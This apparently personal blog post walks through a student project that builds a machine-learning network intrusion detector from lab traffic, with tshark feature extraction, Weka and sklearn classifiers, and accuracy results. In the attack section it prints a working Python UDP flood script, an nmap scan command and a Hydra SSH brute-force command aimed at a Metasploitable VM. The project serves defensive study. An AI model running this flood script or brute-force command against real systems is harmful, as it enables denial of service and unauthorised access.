Basic Machine Learning : Network Anomaly Detection

Disclaimer:- This note was written by me ( Mayank Nauni) in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.

Special Thanks to Kenny Ong, my friend & course-mate at Singapore University of Technology and Design for collaborating with me on this mini-project and Tao Liu for his excellent blog on the same subject https://www.linkedin.com/pulse/build-machine-learning-model-network-flow-tao-liu/

Introduction

The ever-increasing rise in the number of network attacks have evolved as Internet technologies advancements and enhancements continue to improve our lives and in recent years, network intrusion detection has become a significant research issue in the industry.

The term network anomaly detection refers to the identification of the rare and unexpected bursts in activity within computer networking. Network anomaly is an intrusion attempt that is deliberate for (i) accessing information, (ii) information manipulation, or (iii) render a computer system or network unreliable or unusable.

In this project, to provide a proper setup in detecting anomaly detection, the concept of normality needs to be grasped. The traffic captured concerning normality and anomaly needs to be defined. The usage of tools to help create datasets can help us provide more findings in the areas of network intrusion detection methods and systems (NIDS).

 

Lab Setup and Topology

The network topology is set up using GNS3 Emulator as a tool to simulate the network anomaly detection system. The following are the devices and virtual machines (VM).

  • Switch (Gateway) Based on Cisco IOS image (12.4) – 10.0.2.1
  • Kali Attacker VM – 2021.2 release – 10.0.2.15
  • Metasploitable-2 VM – 10.0.2.2
  • SIEM VM – 10.0.2.30

GitHub Repo: https://github.com/mayanknauni/ML_Cybersecurity

Topology Brief:

The topology has been created on GN3 network emulator which used real IOS image for Cisco Switch (12.4 version); the Kali VM (2021.2 Release) and Metasploitable VM are created on VirtualBox and VirtualBox is integrated with GNS3, the VMs are connected to the switch using a generic driver (UDP tunnel).

On the switch end, we have created a SPAN session to capture all traffic for the network port connected to the metasploitable VM and redirect it to the SIEM VM. We will use “tshark” on the SIEM VM to convert the “. pcap” files capture to “.csv” files.

Below is the GN3 topology that we have created and used for this project, the SIEM was an additional VM that was used to sniff the data during attacks to see how the attacks are being perceived by a SIEM software.

Diagram Description automatically generated

Strategy

We will try to build a machine learning model for Wireshark packet-flow classification, we followed the below process to do the same:

The ML model is prepared according to the strategy below:

Our strategy is to execute four attacks, elaborated in the method section, and manually capture packets for them on the metasploitable server end, each capture is labelled accordingly, and later, all four captures are aggregated (including the benign network capture) to form a dataset.

The dataset is then sanitized using the python script which essentially vets the dataset for NaN values and replaces the empty cells with 0.

We also replaced the IP address and TCP flags value with integer values for our algorithm to run properly.

Methods

The creation of the datasets includes capturing the normal and benign communication between these clients and servers through Python scripts and all traffic collected via Wireshark as the packet capture tool.

The 4 kinds of attacks implemented and run from the malicious clients are as follows:

  • DDoS
  • Brute force
  • Probe
  • SQL

From these attacks, benign and malicious traffic is merged and labeled for classification and further analysis via Weka.

Attack Details

The attack was carried out at the timestamps below:

Start Time End Time Exploit Remark
8:05 pm 8:15 pm Benign Simulating usual Web Access by using the watch at 5-second interval to simulate normal web access
watch -n 5 “curl http://10.0.2.2”
8:16 pm 8:20 pm DDOS ddos.py
9:00 pm 9:06 pm Probe nmap
9:15 pm 9:20 pm Bruteforce Hydra
9:30 pm 9:37 pm SQL Metasploitable

Benign Flow Capture

We simulated usual Web Access by using the watch at the 5-second interval and captured the packets:

Command: watch -n 5 “curl http://10.0.2.2”

DDoS Attack and packet capture

We used the below-mentioned python code to simulate DDoS attack on Metasploitable2

import sys
import os
import time
import socket
import random
#Code Time
from DateTime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system(“clear”)
os.system(“figlet DDos Attack”)
print
print
ip = raw_input(“IP Target : “)
port = input(“Port : “)

os.system(“clear”)
os.system(“figlet Attack Starting”)
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print “Sent %s packet to %s throught port:%s”%(sent,ip,port)
if port == 65534:
port = 1

Command: python2 ddos.py

Text Description automatically generated

Text Description automatically generated

The attack started endlessly till we break the sequence.

Nmap Probe and Packet Capture

We used the below-mentioned python code to initiate a probe on Metasploitable2

Command: nmap -sC -sV -oA project 10.0.2.2

The packets were captured during the time when the scan started and completed successfully.

Graphical user interface, application Description automatically generated

Bruteforce and Packet Capture

We used Hydra to launch a brute-force attack on port 22 by SSH login attempts

Command: sudo hydra -V -f -t 4 -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.2

Graphical user interface Description automatically generated

Feature Extraction (using T-Shark)

Command:

tshark -r http.pcap -T fields -E header=y -E separator=, -E quote=d -E occurrence=f -e ip.src -e ip.dst -e ip.len -e ip.flags.df -e ip.flags.mf \-e ip.fragment -e ip.fragment.count -e ip.fragments -e ip.ttl -e ip.proto -e tcp.window_size -e tcp.ack -e tcp.seq -e tcp.len -e tcp.stream -e tcp.urgent_pointer \-e tcp.flags -e tcp.analysis.ack_rtt -e tcp.segments -e tcp.reassembled.length -e http.request -e udp.port -e frame.time_relative -e frame.time_delta -e tcp.time_relative -e tcp.time_delta > benign.csv

We are selecting below 26 features from the Wireshark capture: –

Features Description Type
ip.src Source Address IPv4 address
ip.dst Destination Address IPv4 address
ip.len Total Length Unsigned integer, 2 bytes
ip.flags.df Don’t fragment Boolean
ip.flags.mf More fragments Boolean
ip.fragment IPv4 Fragment Frame number
ip.fragment.count Fragment count Unsigned integer, 4 bytes
ip.fragments IPv4 Fragments Sequence of bytes
ip.ttl Time to Live Unsigned integer, 1 byte
ip.proto Protocol Unsigned integer, 1 byte
tcp.window_size Calculated window size Unsigned integer, 4 bytes
tcp.ack Acknowledgment Number Unsigned integer, 4 bytes
tcp.seq Sequence Number Unsigned integer, 4 bytes
tcp.len TCP Segment Len Unsigned integer, 4 bytes
tcp.stream Stream index Unsigned integer, 4 bytes
tcp.urgent_pointer Urgent Pointer Unsigned integer, 2 bytes
tcp.flags Flags Unsigned integer, 2 bytes
tcp.analysis.ack_rtt The RTT to ACK the segment was Time offset
tcp.segments Reassembled TCP Segments Label
tcp.reassembled.length Reassembled TCP length Unsigned integer, 4 bytes
http.request Request Boolean
udp.port Source or Destination Port Unsigned integer, 2 bytes
frame.time_relative Time since reference or first frame Time offset
frame.time_delta Time delta from previous captured frame Time offset
tcp.time_relative Time since first frame in this TCP stream Time offset
tcp.time_delta Time since previous frame in this TCP stream Time offset

Data Clean-up

Command: python3 step1_cleanup.py benign.csv

The script below removes the row in the supplied csv file, beingn.csv in this case with 0 value, all null values are filled in with 0 and non-integer fields such as tcp.flags, ip.dst and ip.src are converted into integers.

#!/usr/bin/env python

import pandas as pd
import sys
from functools import reduce
import socket
import struct
import ipaddress

filename = sys.argv[1]
file1 = pd.read_csv(filename)
file1.head(10)
file1.isnull().sum
#print(file1.isnull().sum)
# step-1 to replace all null
update_file = file1.fillna(” “)
update_file.isnull().sum()
#print (update_file.isnull().sum())
update_file.to_csv(‘updated_’+filename, index = False)
# step-2 to remove all rows with null value
update_file = file1.fillna(0)
#print (update_file.isnull().sum())
# step-3 to convert tcp.flag, ip.dst, ip.src to integer
update_file[‘tcp.flags’] = update_file[‘tcp.flags’].apply(lambda x: int(str(x), 16))
update_file[‘ip.dst’] = update_file[‘ip.dst’].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file[‘ip.src’] = update_file[‘ip.src’].apply(lambda x: int(ipaddress.IPv4Address(x)))
update_file.to_csv(‘updated_’+filename, index = False)

The command above generated a new file with cleaned up data as “updated_beingn.csv”.

Data Labelling

We use another python script to add another column in the file “updated_benign.csv” with the name “label” and specify the label with the command below: –

Command: python2 step2_labelling.py benign updated_benign.csv

import sys
import csv

label = sys.argv[1]
file_name = sys.argv[2]

file = open(file_name)
content = csv.reader(file)
row0 = content.next()
row0.append(‘label’)
all = []
all.append(row0)
for item in content:
item.append(label)
all.append(item)

new_file = open(label+’_’+ file_name, ‘w’)
writer = csv.writer(new_file, lineterminator=’\n’)
writer.writerows(all)

It creates a new file with name benign_updated_benign.csv, where the benign highlighted in yellow is the label, we have passed with the python script.

This step is repeated for all four attacks and four additional csv files are obtained: –

  • benign_update_benign.csv
  • bruteforce_update_bruteforce.csv
  • ddos_update_ddos.csv
  • probe_update_nmap.csv
  • sqlattack_update_sqlattack.csv

We will aggregate the above five files into our common dataset called “master_dataset.csv”. We will use this dataset further to analyze Weka.

Analysis on Weka

We analyzed the “master_dataset.csv” in Weka software, we opened this csv in Weka, a glimpse of label attribute is below: –

Graphical user interface, application Description automatically generated

Feature Evaluation

We ran RelieFAttributeEval which yielded the below results:

A picture containing text, screenshot, window Description automatically generated

The top 15 attributes out of 26 are ranked below:

Rank Attributes
1 tcp.stream
2 ip.flags.df
3 tcp.flags
4 ip.proto
5 tcp.window_size
6 frame.time_relative
7 ip.len
8 ip.flags.mf
9 udp.port
10 ip.fragment.count
11 tcp.len
12 tcp.analysis.ack_rtt
13 ip.dst
14 ip.fragment
15 tcp.ack

Running Different ML Models

J48

A picture containing text, screenshot, indoor Description automatically generated

Correctly Classified Instances 16204 98.4088 %

Incorrectly Classified Instances 262 1.5912 %

J48 Decision Tree View

Text Description automatically generated

MLP

A picture containing calendar Description automatically generated

Correctly Classified Instances 16148 98.0687 %

Incorrectly Classified Instances 318 1.9313 %

SMO

Graphical user interface, application Description automatically generated

Correctly Classified Instances 15815 96.0464 %

Incorrectly Classified Instances 651 3.9536 %

Naïve Bayes

Correctly Classified Instances 15216 92.4086 %

Incorrectly Classified Instances 1250 7.5914 %

Summary of Weka Models

Based on the outputs above, J48 decision tree model gave us best accuracy so we will proceed to build a detection tool around the same.

Model Accuracy
J48 98.41%
MLP 98.07%
SMO 96.05%
Naïve Bayes 92.41%

Building Offline Detection Tool

We used the below for building our offline detection tool: –

  • Python: 3.8.5 (default, Jan 27 2021, 15:41:15)
  • [GCC 9.3.0]
  • scipy: 1.6.0
  • numpy: 1.19.5
  • matplotlib: 3.4.3
  • pandas: 1.3.1
  • sklearn: 0.24.2

We’ve split our data into 3 datasets, one for training, another for validation, and the last one for testing. After running this program for the default dataset “master_dataset.csv”, we get the output below: –

We used the models below for comparison on accuracy: –

  • ‘LR’ : Logistic Regression
  • ‘LDA’: Linear Discriminant Analysis
  • ‘KNN’: KNeighbors Classifier
  • ‘CART’: Decision Tree Classifier

Command: python3 step3_train.py

Diagram Description automatically generated

We are using CART or Decision Tree, which is a white box type of ML algorithm. The time complexity of decision trees is a function of the number of records and number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.

As seen from the output below CART was reported to have maximum accuracy for the first comparison i.e. 98.21% which is very close to what we observed in Weka i.e. 98.40% accuracy.

The accuracy of the final testing dataset was 98.31%.

We have saved our model using the library joblib as “finalized_DT_model.sav”

Executing this model of new dataset

We initiated a fresh probe, and captured the data, converted to csv, labelled as “unknown” and appended it to master-dataset.csv, we ran the same model again and checked the confusion matrix, as seen below, the confusion matrix shows all counts of the probe into the fourth column which is probe itself.

A picture containing table Description automatically generated

We ran the amended master-dataset.csv on Weka J48 model as well to confirm our results and as expected, it gave us similar results in the confusion matrix, it confirms that the prediction works as expected:

Results

We were able to successfully produce a working detection model using a decision tree algorithm with an accuracy of 98.4%. The results of the tool coincided with the results produced by Weka proving that the tool we’ve created and the model we’ve deployed produces legitimate results.

Discussion

We had tried “CICFlowmeter” to perform feature extraction, while it took us days to just get it running as the majority of dependencies required by it are very old, even after getting it up and running gave erroneous outputs for the same data when subjected to multiple iterations, for example for a flow length of 2200 packets it could only generate 101 packets with output, which made us switch to t-shark instead.

We tried different ways for attacking the metasploitable VM but given the limited resources of our laptop, the VMs would crash frequently hence we had to select the not-so-resource-intensive attack methodologies.

We have concluded that while our model’s accuracy rate is very high i.e. 98.4% accuracy, it is because the dataset we have used is small and hence resulted in some biasness, if we had to do it for a production environment with more infra resources available, we would have run the captures for days.

We have provided below files as part of the submission.

Serial File Remark
1 step1_cleanup.py For csv cleanup
python3 step1_cleanup.py filename.csv
2 step2_labelling.py For labelling the csv
python2 step2_labelling.py benign updated_benign.csv
3 step3_train.py For training and prediction (refers to static file master_dataset.csv)
python3 step3_train.py
4 master_dataset.csv Consolidated DataSet
5 Folder
Wireshark Captures
Raw Attack Wireshark Captures
6 Folder
Labelled Data
Individual attack CSV files
7 finalized_DT_model.sav Saved ML Model
8 ddos.py For DDoS simulation
python2 ddos.py

References

https://machinelearningknowledge.ai/decision-tree-classifier-in-python-sklearn-with-example/

https://stackabuse.com/decision-trees-in-python-with-scikit-learn/

https://github.com/Ha3MrX/DDos-Attack

https://github.com/bibs2091/Anomaly-detection-system

https://github.com/cstub/ml-ids

https://github.com/Kihy/pcap_data/blob/master/normal_flow.csv

https://github.com/abhishekpatel-lpu/CICIDS-2017-intrution-detection

https://www.youtube.com/watch?v=OmM30Nl4pqk

https://thecleverprogrammer.com/2020/08/12/network-security-with-machine-learning/

https://machinelearningmastery.com/machine-learning-in-python-step-by-step/

https://stackabuse.com/decision-trees-in-python-with-scikit-learn/

https://stackoverflow.com/questions/62695117/convert-an-ip-address-into-a-string-python

https://stackoverflow.com/questions/5619685/conversion-from-ip-string-to-integer-and-backward-in-python

 

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.